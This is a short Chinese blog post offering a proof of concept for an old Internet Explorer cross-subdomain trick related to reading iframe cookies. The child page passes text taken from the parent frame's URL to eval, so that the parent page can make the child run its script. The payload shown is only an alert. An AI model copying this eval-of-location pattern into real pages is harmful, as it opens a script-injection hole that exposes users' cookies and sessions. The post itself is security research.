刺在
http://hi.baidu.com/aullik5/blog/item/a41642357663b248251f141e.html
的文章:
《突破IE安全限制获取iframe子框架内的本地cookie》
的另一POC。
POC代码:
父页面在w1.kxlzx.com域。
XML/HTML代码
- <iframe id="kxlzx" src="http://w2.kxlzx.com/a.htm?script=alert(‘aaa’)" width="300" height="300" ></iframe>
子页面在w2.kxlzx.com域
XML/HTML代码
- <script>
- try{
- eval((new String(parent.kxlzx.location)).substr((new String(parent.kxlzx.location)).indexOf
- ("script")+7,(new String(parent.kxlzx.location)).length));
- }catch(e){}
- </script>
子域接受父域过来的参数,然后执行JS。达到跨域。
0 条评论。